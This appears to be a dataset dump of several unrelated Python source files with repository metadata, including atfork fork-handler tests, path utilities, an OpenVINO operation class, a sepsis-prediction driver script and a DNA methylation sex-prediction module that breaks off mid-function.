| 34.78 | 88 | 0.617021 | 1,647 | 0.947096 | 0 | 0 | 0 | 0 | 0 | 0 | 153 | 0.087982 |
6a12692597c07586454530c9bcf5baae61076b3f | 7,499 | py | Python | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | tests/atfork/test_atfork.py | luciferliu/xTools | 324ef1388be13ece0d952e3929eb685212d573f1 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Licensed to the PSF under a Contributor Agreement.
#
# Author: Gregory P. Smith <[email protected]>
"""Tests for atfork."""
import os
import sys
import importlib
from xTool.compat import StringIO
import traceback
import unittest
from xTool import atfork
class AtforkTest(unittest.TestCase):
def setUp(self):
atfork.monkeypatch_os_fork_functions()
self.calls = []
self.orig_stderr = sys.stderr
self.assertFalse(
atfork._fork_lock.locked(),
"atfork._fork_lock not released by an earlier test!",
)
# Unregister calls registered by earlier tests.
atfork._prepare_call_list = []
atfork._parent_call_list = []
atfork._child_call_list = []
def tearDown(self):
# Un-monkeypatch the os module. ook.
global os
importlib.reload(os)
sys.stderr = self.orig_stderr
def _pre(self):
self.calls.append(self._pre)
def _parent(self):
self.calls.append(self._parent)
def _child(self):
self.calls.append(self._child)
def _other(self):
self.calls.append(self._other)
def _raise_pre(self):
self._pre()
raise RuntimeError("This as the first parent error expected.")
def _raise_parent(self):
self._parent()
raise RuntimeError("This as the second parent error expected.")
def _raise_child(self):
self._child()
raise RuntimeError("This child error is expected.")
def _assert_expected_parent_stderr(self, error_msg):
self.assertTrue(("first parent error" in error_msg), error_msg)
self.assertTrue(("second parent error" in error_msg), error_msg)
self.assertTrue(
(error_msg.index("first parent") < error_msg.index("second parent")),
"first and second errors out of order in:\n%r" % error_msg,
)
self.assertEqual(2, error_msg.count("RuntimeError:"))
def _assert_expected_child_stderr(self, error_msg):
self.assertTrue("child error is expected" in error_msg)
self.assertEqual(1, error_msg.count("RuntimeError:"), error_msg)
def test_monkeypatching(self):
if not hasattr(os, "fork"):
return # Nothing to test on this platform.
self.assertTrue(callable(atfork._orig_os_fork))
self.assertTrue(callable(atfork._orig_os_forkpty))
# The os module was patched, these should not be equal.
self.assertNotEqual(atfork._orig_os_fork, os.fork)
self.assertNotEqual(atfork._orig_os_forkpty, os.forkpty)
# These are the wrapped versions we patched in.
self.assertEqual(atfork.os_fork_wrapper, os.fork)
self.assertEqual(atfork.os_forkpty_wrapper, os.forkpty)
def test_register_atfork_calls(self):
# Test with both positional and keyword arguments as well as None.
atfork.atfork(self._pre, self._parent, self._child)
atfork.atfork(prepare=self._pre)
atfork.atfork(parent=self._parent)
atfork.atfork(child=self._child)
self.assertEqual([self._pre] * 2, atfork._prepare_call_list)
self.assertEqual([self._parent] * 2, atfork._parent_call_list)
self.assertEqual([self._child] * 2, atfork._child_call_list)
if __debug__:
self.assertRaises(AssertionError, atfork.atfork, 1, 2, 3)
def test_call_atfork_list(self):
self.assertEqual([], atfork._call_atfork_list([]))
self.assertEqual([], atfork._call_atfork_list([self._pre]))
def raise_something():
raise RuntimeError()
errors = atfork._call_atfork_list([raise_something] * 2)
self.assertEqual(2, len(errors))
for exc_info in errors:
self.assertEqual(RuntimeError, exc_info[0])
def _test_a_fork_wrapper(self, fork_func):
sys.stderr = StringIO() # restored in tearDown
atfork.atfork(self._raise_pre, self._raise_parent, self._raise_child)
atfork.atfork(self._other, self._other, self._other)
pid = fork_func()
if pid == 0:
try:
try:
self.assertEqual(
[self._pre, self._other, self._child, self._other], self.calls
)
self.assertFalse(atfork._fork_lock.locked())
self._assert_expected_child_stderr(sys.stderr.getvalue())
except BaseException:
try:
traceback.print_exc()
self.orig_stderr.write(sys.stderr.getvalue())
finally:
os._exit(1)
finally:
os._exit(0)
else:
self.assertEqual(
[self._pre, self._other, self._parent, self._other], self.calls
)
self.assertFalse(atfork._fork_lock.locked())
self.assertEqual(0, os.waitpid(pid, 0)[1], "error in child")
self._assert_expected_parent_stderr(sys.stderr.getvalue())
def test_os_fork_wrapper(self):
self._test_a_fork_wrapper(os.fork)
def test_os_forkpty_wrapper(self):
self._test_a_fork_wrapper(lambda: os.forkpty()[0])
def _test_fork_failure(self, orig_fork_attrname, fork_wrapper):
def failing_fork():
raise OSError(0, "testing a fork failure")
atfork.atfork(self._pre, self._parent, self._child)
orig_orig_fork = getattr(atfork, orig_fork_attrname)
try:
setattr(atfork, orig_fork_attrname, failing_fork)
try:
pid = fork_wrapper()
if pid == 0:
# This should never happen but do this just in case.
os._exit(0)
except OSError:
self.assertEqual([self._pre, self._parent], self.calls)
else:
self.fail("Fork failed to fail!")
finally:
setattr(atfork, orig_fork_attrname, orig_orig_fork)
def test_fork_wrapper_failure(self):
self._test_fork_failure("_orig_os_fork", atfork.os_fork_wrapper)
def test_forkpty_wrapper_failure(self):
self._test_fork_failure("_orig_os_forkpty", atfork.os_forkpty_wrapper)
def test_multiple_monkeypatch_safe(self):
self.assertNotEqual(atfork._orig_os_fork, atfork.os_fork_wrapper)
self.assertNotEqual(atfork._orig_os_forkpty, atfork.os_forkpty_wrapper)
atfork.monkeypatch_os_fork_functions()
self.assertNotEqual(atfork._orig_os_fork, atfork.os_fork_wrapper)
self.assertNotEqual(atfork._orig_os_forkpty, atfork.os_forkpty_wrapper)
atfork.monkeypatch_os_fork_functions()
self.assertNotEqual(atfork._orig_os_fork, atfork.os_fork_wrapper)
self.assertNotEqual(atfork._orig_os_forkpty, atfork.os_forkpty_wrapper)
if __name__ == "__main__":
unittest.main()
| 37.123762 | 86 | 0.648887 | 6,575 | 0.876784 | 0 | 0 | 0 | 0 | 0 | 0 | 1,530 | 0.204027 |
6a131e98cf16cdcab3785e1e0af7a922aba56c50 | 2,213 | py | Python | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | [
"MIT"
] | null | null | null | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | [
"MIT"
] | null | null | null | IO/files/handling.py | brendano257/Zugspitze-Schneefernerhaus | 64bb86ece2eec147f2a7fb412f87ff2313388753 | [
"MIT"
] | null | null | null | import os
from pathlib import Path
__all__ = ['list_files_recur', 'scan_and_create_dir_tree', 'get_all_data_files', 'get_subsubdirs']
def list_files_recur(path):
"""
Cheater function that wraps path.rglob().
:param Path path: path to list recursively
:return list: list of Path objects
"""
files = []
for file in path.rglob('*'):
files.append(file)
return files
def scan_and_create_dir_tree(path, file=True):
"""
Creates all the necessary directories for the file at the end of path to be created.
When specified with a filepath to a file or folder, it creates directories until the path is valid.
:param Path path: must end with a filename, else the final directory won't be created
:param bool file: Boolean, does the given path end with a file? If not, path.parts[-1] will be created
:return None:
"""
parts = path.parts
path_to_check = Path(parts[0])
for i in range(1, len(parts)):
if not path_to_check.exists():
path_to_check.mkdir()
path_to_check = path_to_check / parts[i]
if file:
pass
else:
if not path_to_check.exists():
path_to_check.mkdir()
def get_all_data_files(path, filetype):
"""
Recursively search the given directory for .xxx files.
:param Path path: Path to search
:param str filetype: str, ".type" of file to search for
:return list: list of file-like Path objects
"""
files = list_files_recur(path)
files[:] = [file for file in files if filetype in file.name]
return files
def get_subsubdirs(path):
"""
Get the second-level subdirectories of the given path.
If given path 'a/b', a sample return would be ['a/b/c/d', 'a/b/c/d2', 'a/b/c/etc']
:param str path:
:return list: list containing Path instances for all paths found two levels below the supplied path
"""
leveltwo_subdirs = []
immediate_subdirs = [os.scandir(subdir) for subdir in os.scandir(path) if Path(subdir).is_dir()]
for scan in immediate_subdirs:
for subdir in scan:
leveltwo_subdirs.append(Path(subdir)) if Path(subdir).is_dir() else None
return leveltwo_subdirs
| 28.371795 | 106 | 0.66742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,149 | 0.519205 |
6a139742e2452134cace4ac02e78a8badeceb098 | 2,617 | py | Python | tools/mo/openvino/tools/mo/ops/detection_output_onnx.py | ryanloney/openvino-1 | 4e0a740eb3ee31062ba0df88fcf438564f67edb7 | [
"Apache-2.0"
] | 1,127 | 2018-10-15T14:36:58.000Z | 2020-04-20T09:29:44.000Z | tools/mo/openvino/tools/mo/ops/detection_output_onnx.py | ryanloney/openvino-1 | 4e0a740eb3ee31062ba0df88fcf438564f67edb7 | [
"Apache-2.0"
] | 439 | 2018-10-20T04:40:35.000Z | 2020-04-19T05:56:25.000Z | tools/mo/openvino/tools/mo/ops/detection_output_onnx.py | ryanloney/openvino-1 | 4e0a740eb3ee31062ba0df88fcf438564f67edb7 | [
"Apache-2.0"
] | 414 | 2018-10-17T05:53:46.000Z | 2020-04-16T17:29:53.000Z | # Copyright (C) 2018-2022 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import numpy as np
from openvino.tools.mo.front.common.partial_infer.utils import dynamic_dimension_value, shape_array, set_input_shapes
from openvino.tools.mo.ops.op import Op
class ExperimentalDetectronDetectionOutput(Op):
op = 'ExperimentalDetectronDetectionOutput'
enabled = True
def __init__(self, graph, attrs):
mandatory_props = dict(
type=self.op,
op=self.op,
version='opset6',
infer=self.infer,
reverse_infer=self.reverse_infer,
type_infer=self.type_infer,
in_ports_count=4,
out_ports_count=3,
)
super().__init__(graph, mandatory_props, attrs)
def backend_attrs(self):
return [
('class_agnostic_box_regression', lambda node: str(bool(node['class_agnostic_box_regression'])).lower()),
'max_detections_per_image',
'nms_threshold',
'num_classes',
'post_nms_count',
'score_threshold',
'max_delta_log_wh',
('deltas_weights', lambda node: ','.join(map(str, node['deltas_weights'])))]
@staticmethod
def infer(node):
rois_num = node.max_detections_per_image
# boxes
node.out_port(0).data.set_shape([rois_num, 4])
# classes, scores, batch indices
# We use range(1, 1 + max(node.out_ports().keys())) instead of range(1, 3), because there are incorrectly
# generated models where ExperimentalDetectronDetectionOutput has 4 outputs.
for port_ind in range(1, 1 + max(node.out_ports().keys())):
if not node.out_port(port_ind).disconnected():
node.out_port(port_ind).data.set_shape([rois_num])
@staticmethod
def type_infer(node):
in_data_type = node.in_port(0).get_data_type()
node.out_port(0).set_data_type(in_data_type)
node.out_port(1).set_data_type(np.int32) # the second output contains class indices
node.out_port(2).set_data_type(in_data_type)
if node.is_out_port_connected(3):
node.out_port(3).set_data_type(np.int32) # the fourth output contains batch indices
@staticmethod
def reverse_infer(node):
set_input_shapes(node,
shape_array([dynamic_dimension_value, 4]),
shape_array([dynamic_dimension_value, node['num_classes'] * 4]),
shape_array([dynamic_dimension_value, node['num_classes']]),
shape_array([1, 3]))
| 39.059701 | 117 | 0.635078 | 2,353 | 0.899121 | 0 | 0 | 1,383 | 0.528468 | 0 | 0 | 658 | 0.251433 |
6a139aa59f68903a8a744250e0c92696c28eb301 | 2,046 | py | Python | driver.py | FahimMahmudJoy/Physionet_2019_Sepsis | d31bec40aa0359071bfaff1a4d72569c5731a04e | [
"BSD-2-Clause"
] | 1 | 2019-06-26T19:38:33.000Z | 2019-06-26T19:38:33.000Z | driver.py | FahimMahmudJoy/Physionet_2019_Sepsis | d31bec40aa0359071bfaff1a4d72569c5731a04e | [
"BSD-2-Clause"
] | null | null | null | driver.py | FahimMahmudJoy/Physionet_2019_Sepsis | d31bec40aa0359071bfaff1a4d72569c5731a04e | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import numpy as np, os, sys
from get_sepsis_score import load_sepsis_model, get_sepsis_score
def load_challenge_data(file):
with open(file, 'r') as f:
header = f.readline().strip()
column_names = header.split('|')
data = np.loadtxt(f, delimiter='|')
# Ignore SepsisLabel column if present.
if column_names[-1] == 'SepsisLabel':
column_names = column_names[:-1]
data = data[:, :-1]
return data
def save_challenge_predictions(file, scores, labels):
with open(file, 'w') as f:
f.write('PredictedProbability|PredictedLabel\n')
for (s, l) in zip(scores, labels):
f.write('%g|%d\n' % (s, l))
if __name__ == '__main__':
# Parse arguments.
if len(sys.argv) != 3:
raise Exception('Include the input and output directories as arguments, e.g., python driver.py input output.')
input_directory = sys.argv[1]
output_directory = sys.argv[2]
# Find files.
files = []
for f in os.listdir(input_directory):
if os.path.isfile(os.path.join(input_directory, f)) and not f.lower().startswith('.') and f.lower().endswith('psv'):
files.append(f)
if not os.path.isdir(output_directory):
os.mkdir(output_directory)
# Load model.
model = load_sepsis_model()
print(model)
# Iterate over files.
for f in files:
# Load data.
input_file = os.path.join(input_directory, f)
data = load_challenge_data(input_file)
# print(type(data))
# Make predictions.
num_rows = len(data)
scores = np.zeros(num_rows)
labels = np.zeros(num_rows)
for t in range(num_rows):
current_data = data[:t+1]
current_score, current_label = get_sepsis_score(current_data, model)
scores[t] = current_score
labels[t] = current_label
# Save results.
output_file = os.path.join(output_directory, f)
save_challenge_predictions(output_file, scores, labels)
| 30.537313 | 124 | 0.623167 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 381 | 0.186217 |
6a139fa7954e69a2e28f61ebd4a2c8e7028fb83e | 2,589 | py | Python | src/LspRuntimeMonitor.py | TafsirGna/ClspGeneticAlgorithm | 25184afbbd52773b8aed2e268ae98dd9656cacda | [
"MIT"
] | null | null | null | src/LspRuntimeMonitor.py | TafsirGna/ClspGeneticAlgorithm | 25184afbbd52773b8aed2e268ae98dd9656cacda | [
"MIT"
] | null | null | null | src/LspRuntimeMonitor.py | TafsirGna/ClspGeneticAlgorithm | 25184afbbd52773b8aed2e268ae98dd9656cacda | [
"MIT"
] | null | null | null | #!/usr/bin/python3.5
# -*-coding: utf-8 -*
from collections import defaultdict
from threading import Thread
from time import perf_counter, time
from LspLibrary import bcolors
import time
import matplotlib.pyplot as plt
class LspRuntimeMonitor:
"""
"""
clockStart = None
clockEnd = None
mutation_strategy = "simple_mutation"
popsData = defaultdict(lambda: None)
outputString = ""
outputFilePath = "data/output/output.txt"
verbose = False
running = True
def __init__(self) -> None:
"""
"""
pass
@classmethod
def duration(cls):
"""
"""
return f"{cls.clockEnd - cls.clockStart} second(s)"
@classmethod
def started(cls):
"""
"""
cls.running = True
LspRuntimeMonitor.clockStart = perf_counter()
print(f"{bcolors.OKGREEN}Processing input data.{bcolors.ENDC}")
# Thread(cls.waitingAnimation())
@classmethod
def ended(cls):
"""
"""
cls.running = False
LspRuntimeMonitor.clockEnd = perf_counter()
@classmethod
def output(cls, output):
"""
"""
cls.outputString += output
if cls.verbose:
print(output)
@classmethod
def saveOutput(cls):
"""
"""
f = open(cls.outputFilePath, "w")
f.write(cls.outputString)
f.close()
@classmethod
def report(cls):
"""
"""
# Duration
durationStatement = cls.duration()
cls.output(durationStatement)
# Saving all generated output to a default file
cls.saveOutput()
cls.plotData()
@classmethod
def plotData(cls):
"""
"""
print('-----------------------------------------')
print(cls.popsData)
data = list(cls.popsData.values())[0]
# Plots
# Plotting the evolution of the minimal cost over generations
plt.plot(list(range(len(data["max"]))), data["max"])
plt.ylabel("Population maximal cost")
plt.show()
# Plotting the evolution of the minimal cost over generations
plt.plot(list(range(len(data["min"]))), data["min"])
plt.ylabel("Population minimal cost")
plt.show()
@classmethod
def waitingAnimation(cls):
"""
"""
animation = "|/-\\"
idx = 0
# while thing_not_complete():
while cls.running:
print(animation[idx % len(animation)], end="\r")
idx += 1
time.sleep(0.1) | 21.940678 | 71 | 0.545384 | 2,367 | 0.914253 | 0 | 0 | 1,969 | 0.760525 | 0 | 0 | 704 | 0.27192 |
6a1517953444573e16ddd717619e49c3ca5152a5 | 70 | py | Python | core/github/parsers/__init__.py | goranc/GraphYourCodeVulnerability | 72c04ed5d63602f295d9ac31e97c97935ca78e1b | [
"Apache-2.0"
] | null | null | null | core/github/parsers/__init__.py | goranc/GraphYourCodeVulnerability | 72c04ed5d63602f295d9ac31e97c97935ca78e1b | [
"Apache-2.0"
] | 2 | 2021-12-22T11:59:47.000Z | 2022-01-19T19:28:36.000Z | core/github/parsers/__init__.py | goranc/GraphYourCodeVulnerability | 72c04ed5d63602f295d9ac31e97c97935ca78e1b | [
"Apache-2.0"
] | 5 | 2021-12-22T11:09:23.000Z | 2021-12-26T10:18:49.000Z | from .python.parser import PythonParser
all_parsers = [PythonParser]
| 17.5 | 39 | 0.814286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
6a152a32efa9784006230b4163868ce2479ff3ba | 20,737 | py | Python | methylcheck/predict/sex.py | FoxoTech/methylcheck | 881d14d78e6086aab184716e0b79cdf87e9be8bf | [
"MIT"
] | null | null | null | methylcheck/predict/sex.py | FoxoTech/methylcheck | 881d14d78e6086aab184716e0b79cdf87e9be8bf | [
"MIT"
] | 11 | 2021-04-08T16:14:54.000Z | 2022-03-09T00:22:13.000Z | methylcheck/predict/sex.py | FoxoTech/methylcheck | 881d14d78e6086aab184716e0b79cdf87e9be8bf | [
"MIT"
] | 1 | 2022-02-10T09:06:45.000Z | 2022-02-10T09:06:45.000Z | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from pathlib import Path
#app
import methylcheck # uses .load; get_sex uses methylprep models too and detect_array()
import logging
LOGGER = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def _get_copy_number(meth,unmeth):
"""function to return copy number.
requires dataframes of methylated and
unmethylated values. can be raw OR corrected"""
# minfi R version:
# log2(getMeth(object) + getUnmeth(object))
return np.log2(meth+unmeth)
def get_sex(data_source, array_type=None, verbose=False, plot=False, save=False,
on_lambda=False, median_cutoff= -2, include_probe_failure_percent=True,
poobah_cutoff=20, custom_label=None, return_fig=False, return_labels=False):
"""This will calculate and predict the sex of each sample.
inputs:
=======
the "data_source" can be any one of:
path -- to a folder with csv data that contains processed sample data
path -- to a folder with the 'meth_values.pkl' and 'unmeth_values.pkl' dataframes
path -- to a folder also containing samplesheet pkl and poobah_values.pkl, if you want to compare predicted sex with actual sex.
data_containers -- object created from methylprep.run_pipeline() or methylcheck.load(path, 'meth')
tuple of (meth, unmeth) dataframes
array_type (string)
enum: {'27k','450k','epic','epic+','mouse'}
if not specified, it will load the data from data_source and determine the array for you.
median_cutoff
the minimum difference in the medians of X and Y probe copy numbers to assign male or female
(copied from the minfi sex predict function)
include_probe_failure_percent:
True: includes poobah percent per sample as column in the output table and on the plot.
Note: you must supply a 'path' as data_source to include poobah in plots.
poobah_cutoff
The maximum percent of sample probes that can fail before the sample fails. Default is 20 (percent)
Has no effect if `include_probe_failure_percent` is False.
plot
True: creates a plot, with option to `save` as image or `return_fig`.
save
True: saves the plot, if plot is True
return_fig
If True, returns a pyplot figure instead of a dataframe. Default is False.
Note: return_fig will not show a plot on screen.
return_labels: (requires plot == True)
When using poobah_cutoff, the figure only includes A-Z,1...N labels on samples on plot to make it easier to read.
So to get what sample_ids these labels correspond to, you can rerun the function with return_labels=True and it will
skip plotting and just return a dictionary with sample_ids and these labels, to embed in a PDF report if you like.
custom_label:
Option to provide a dictionary with keys as sample_ids and values as labels to apply to samples.
e.g. add more data about samples to the multi-dimensional QC plot
while providing a filepath is the easiest way, you can also pass in a data_containers object,
a list of data_containers containing raw meth/unmeth values, instead. This object is produced
by methylprep.run_pipeline, or by using methylcheck.load(filepath, format='meth') and lets you
customize the import if your files were not prepared using methylprep (non-standand CSV columns, for example)
If a `poobah_values.pkl` file can be found in path, the dataframe returned will also include
percent of probes for X and Y chromosomes that failed quality control, and warn the user if any did.
This feature won't work if a containers object or tuple of dataframes is passed in, instead of a path.
Note: ~90% of Y probes should fail if the sample is female. That chromosome is missing."""
allowed_array_types = {'27k','450k','epic','epic+','mouse'}
try:
from methylprep.files import Manifest
from methylprep.models import ArrayType
except ImportError:
raise ImportError("This function requires methylprep to be installed (pip3 install `methylprep`)")
(data_source_type, data_source) = methylcheck.load_processed._data_source_type(data_source)
# data_source_type is one of {'path', 'container', 'control', 'meth_unmeth_tuple'}
poobah=None
if data_source_type in ('path'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
try:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=False, verbose=False)
except Exception as e:
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=None, path=data_source,
compare=False, noob=True, verbose=False)
if include_probe_failure_percent == True and Path(data_source,'poobah_values.pkl').expanduser().exists():
poobah = pd.read_pickle(Path(data_source,'poobah_values.pkl').expanduser())
elif data_source_type in ('container'):
# this will look for saved pickles first, then csvs or parsing the containers (which are both slower)
# the saved pickles function isn't working for batches yet.
meth, unmeth = methylcheck.qc_plot._get_data(
data_containers=data_source, path=None,
compare=False, noob=False, verbose=False)
elif data_source_type == 'meth_unmeth_tuple':
(meth, unmeth) = data_source
if len(meth) != len(unmeth):
raise ValueError(f"WARNING: probe count mismatch: meth {len(meth)} -- unmeth {len(unmeth)}")
if array_type == None:
# get list of X any Y probes - using .methylprep_manifest_files (or MANIFEST_DIR_PATH_LAMBDA) and auto-detected array here
array_type = ArrayType(methylcheck.detect_array(meth, on_lambda=on_lambda))
elif isinstance(array_type,str):
if array_type in allowed_array_types:
array_type = ArrayType(array_type)
else:
raise ValueError(f"Your array_type must be one of these: {allowed_array_types} or None.")
if verbose:
LOGGER.debug(array_type)
LOGGER.setLevel(logging.WARNING)
manifest = Manifest(array_type, on_lambda=on_lambda, verbose=verbose)._Manifest__data_frame # 'custom', '27k', '450k', 'epic', 'epic+'
LOGGER.setLevel(logging.INFO)
x_probes = manifest.index[manifest['CHR']=='X']
y_probes = manifest.index[manifest['CHR']=='Y']
if verbose:
LOGGER.info(f"Found {len(x_probes)} X and {len(y_probes)} Y probes")
# dataframes of meth and unmeth values for the sex chromosomes
x_meth = meth[meth.index.isin(x_probes)]
x_unmeth = unmeth[unmeth.index.isin(x_probes)]
y_meth = meth[meth.index.isin(y_probes)]
y_unmeth = unmeth[unmeth.index.isin(y_probes)]
# create empty dataframe for output
output = pd.DataFrame(index=[s for s in meth.columns], columns=['x_median','y_median','predicted_sex'])
# get median values for each sex chromosome for each sample
x_med = _get_copy_number(x_meth,x_unmeth).median()
y_med = _get_copy_number(y_meth,y_unmeth).median()
# populate output dataframe with values
output['x_median'] = output.index.map(x_med)
output['y_median'] = output.index.map(y_med)
# compute difference
median_difference = output['y_median'] - output['x_median']
# median cutoff - can be manipulated by user --- default = -2 --- used to predict sex
sex0 = ['F' if x < median_cutoff else 'M' for x in median_difference]
# NOTE for testing: GSE85566/GPL13534 (N=120) has 4 samples that are predicted as wrong sex when using -2, but work at -0.5.
# populate dataframe with predicted sex
output['predicted_sex'] = sex0
output = output.round(1)
# if poobah_df exists, calculate percent X and Y probes that failed
sample_failure_percent = {} # % of ALL probes in sample, not just X or Y
if include_probe_failure_percent == True and isinstance(poobah, pd.DataFrame):
p_value_cutoff = 0.05
X_col = []
Y_col = []
failed_samples = []
for column in poobah.columns:
sample_failure_percent[column] = round(100*len(poobah[column][poobah[column] >= p_value_cutoff].index) / len(poobah.index),1)
failed_probe_names = poobah[column][poobah[column] >= p_value_cutoff].index
failed_x_probe_names = list(set(failed_probe_names) & set(x_probes))
failed_y_probe_names = list(set(failed_probe_names) & set(y_probes))
X_percent = round(100*len(failed_x_probe_names)/poobah.index.isin(list(x_probes)).sum(),1)
Y_percent = round(100*len(failed_y_probe_names)/poobah.index.isin(list(y_probes)).sum(),1)
X_col.append(X_percent)
Y_col.append(Y_percent)
if X_percent > 10:
failed_samples.append(column)
output['X_fail_percent'] = X_col #output.index.map(X_col)
output['Y_fail_percent'] = Y_col #output.index.map(Y_col)
if failed_samples != []:
LOGGER.warning(f"{len(failed_samples)} samples had >10% of X probes fail p-value probe detection. Predictions for these may be unreliable:")
LOGGER.warning(f"{failed_samples}")
if data_source_type in ('path'):
output = _fetch_actual_sex_from_sample_sheet_meta_data(data_source, output)
if plot == True:
fig = _plot_predicted_sex(data=output, # 'x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent'
sample_failure_percent=sample_failure_percent,
median_cutoff=median_cutoff,
include_probe_failure_percent=include_probe_failure_percent,
verbose=verbose,
save=save,
poobah_cutoff=poobah_cutoff,
custom_label=custom_label,
data_source_type=data_source_type,
data_source=data_source,
return_fig=return_fig,
return_labels=return_labels,
)
if return_labels:
return fig # these are a lookup dictionary of labels
if return_fig:
return fig
return output
def _plot_predicted_sex(data=pd.DataFrame(),
sample_failure_percent={},
median_cutoff= -2,
include_probe_failure_percent=True,
verbose=False,
save=False,
poobah_cutoff=20, #%
custom_label=None,
data_source_type=None,
data_source=None,
return_fig=False,
return_labels=False):
"""
data columns: ['x_median', 'y_median', 'predicted_sex', 'X_fail_percent', 'Y_fail_percent']
- color is sex, pink or blue
- marker circle size will be larger and more faded if poobah values are worse, smaller and darker if low variance. Like a probability cloud.
- sample text is (ID, delta age)
- sex mismatches are X, matched samples are circles (if samplesheet contains actual sex data)
- omits labels for samples that have LOW failure rates, but shows IDs when failed
- adds legend of sketchy samples and labels
- show delta age on labels (using custom column dict)
- unit tests with custom label and without, and check that controls_report still works with this function
- save_fig
- return_labels, returns a lookup dict instead of plot
if there is a "custom_label" dict passed in, such as (actual_age - predicted_age), it simply adds those this label to the marker text labels.
Dicts must match the data DF index.
"""
if sample_failure_percent != {} and set(sample_failure_percent.keys()) == set(data.index):
data['sample_failure_percent'] = pd.Series(sample_failure_percent)
else:
LOGGER.warning("sample_failure_percent index did not align with output data index")
#sns.set_theme(style="white")
show_mismatches = None if 'sex_matches' not in data.columns else "sex_matches"
if show_mismatches:
data["sex_matches"] = data["sex_matches"].map({0:"Mismatch", 1:"Match"})
show_failure = None if 'sample_failure_percent' not in data.columns else "sample_failure_percent"
sample_sizes = (20, 600)
if show_failure: # avoid sizing dots with narrow range; gives false impression of bad samples.
poobah_range = data["sample_failure_percent"].max() - data["sample_failure_percent"].min()
if poobah_range < poobah_cutoff/2:
show_failure = None
sample_sizes = (40,40)
custom_palette = sns.set_palette(sns.color_palette(['#FE6E89','#0671B7']))
# if only one sex, make sure male is blue; female is pink
# if hasattr(output, 'actual_sex') and set(output.actual_sex) == set('M')
# if first value to be plotted is male, change palette
if hasattr(data, 'predicted_sex') and list(data.predicted_sex)[0] == 'M':
custom_palette = sns.set_palette(sns.color_palette(['#0671B7','#FE6E89']))
fig = sns.relplot(data=data,
x='x_median',
y='y_median',
hue="predicted_sex",
size=show_failure,
style=show_mismatches,
sizes=sample_sizes,
alpha=.5,
palette=custom_palette,
height=8,
aspect=1.34)
ax = fig.axes[0,0]
fig.fig.subplots_adjust(top=.95)
# for zoomed-in plots with few points close together, set the min scale to be at least 2 units.
yscale = plt.gca().get_ylim()
xscale = plt.gca().get_xlim()
if abs(yscale[1]-yscale[0]) < 2.0:
ax.set_xlim(xmin=xscale[0]-1, xmax=xscale[1]+1)
ax.set_ylim(ymin=yscale[0]-1, ymax=yscale[1]+1)
label_lookup = {index_val: chr(i+65) if (i <= 26) else str(i-26) for i,index_val in enumerate(data.index)}
for idx,row in data.iterrows():
if "sample_failure_percent" in row and row['sample_failure_percent'] > poobah_cutoff:
label = f"{label_lookup[idx]}, {custom_label.get(idx)}" if isinstance(custom_label, dict) and custom_label.get(idx) else label_lookup[idx]
ax.text(row['x_median'], row['y_median'], label, horizontalalignment='center', fontsize=10, color='darkred')
else:
label = f"{custom_label.get(idx)}" if isinstance(custom_label, dict) else None
if label:
ax.text(row['x_median']+0.05, row['y_median']+0.05, label, horizontalalignment='center', fontsize=10, color='grey')
if return_labels:
plt.close() # release memory
return label_lookup
if "sample_failure_percent" in data.columns:
N_failed = len(data[data['sample_failure_percent'] > poobah_cutoff].index)
N_total = len(data['sample_failure_percent'].index)
ax.set_title(f"{N_failed} of {N_total} samples failed poobah, with at least {poobah_cutoff}% of probes failing")
else:
ax.set_title(f"Predicted sex based on matching X and Y probes.")
if save:
filepath = 'predicted_sexes.png' if data_source_type != 'path' else Path(data_source,'predicted_sexes.png').expanduser()
plt.savefig(filepath, bbox_inches="tight")
if return_fig:
return fig
plt.show()
def _fetch_actual_sex_from_sample_sheet_meta_data(filepath, output):
"""output is a dataframe with Sample_ID in the index. This adds actual_sex as a column and returns it."""
# controls_report() does the same thing, and only calls get_sex() with the minimum of data to be fast, because these are already loaded. Just passes in meth/unmeth data
# Sample sheet should have 'M' or 'F' in column to match predicted sex.
# merge actual sex into processed output, if available
file_patterns = {
'sample_sheet_meta_data.pkl': 'meta',
'*_meta_data.pkl': 'meta',
'*samplesheet*.csv': 'meta',
'*sample_sheet*.csv': 'meta',
}
loaded_files = {}
for file_pattern in file_patterns:
for filename in Path(filepath).expanduser().rglob(file_pattern):
if '.pkl' in filename.suffixes:
loaded_files['meta'] = pd.read_pickle(filename)
break
if '.csv' in filename.suffixes:
loaded_files['meta'] = pd.read_csv(filename)
break
if len(loaded_files) == 1:
# methylprep v1.5.4-6 was creating meta_data files with two Sample_ID columns. Check and fix here:
# methylcheck 0.7.9 / prep 1.6.0 meta_data lacking Sample_ID when sample_sheet uses alt column names and gets replaced.
if any(loaded_files['meta'].columns.duplicated()):
loaded_files['meta'] = loaded_files['meta'].loc[:, ~loaded_files['meta'].columns.duplicated()]
LOGGER.info("Removed a duplicate Sample_ID column in samplesheet")
if 'Sample_ID' in loaded_files['meta'].columns:
